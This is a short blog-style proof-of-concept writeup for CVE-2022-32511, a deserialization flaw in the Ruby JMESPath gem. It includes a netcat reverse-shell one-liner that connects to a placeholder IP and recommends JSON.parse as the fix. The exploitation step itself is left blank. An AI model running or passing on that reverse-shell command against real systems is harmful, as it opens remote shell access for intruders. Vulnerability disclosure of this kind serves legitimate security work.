Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution

TL;DR →

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of `JSON.load` which is considered unsafe when used with untrusted input. In order to reproduce the steps, we first require to install ‘JMESPath 1.6.0’ or before: Jmespath. Pick the desired payload, I have picked one from [pentestmonkey.net/cheat-sheet/shells/reverse-shells.

Description

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.

Proof-of-concept

In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before:

2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:

irb

3. In case you don’t have ‘irb’ installed then use the following command to download the same:

gem install IRB

4. Pick the desired payload, I have picked one from pentestmonkey:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell:

Conclusion

It is recommended to use JSON.parse instead of JSON.load . In this case, we observed that the JSON.load has failed to validate the input data which leads to Remote Code Execution.

This story on HackerNoon has a decentralized backup on Sia.

Meta Data: 📄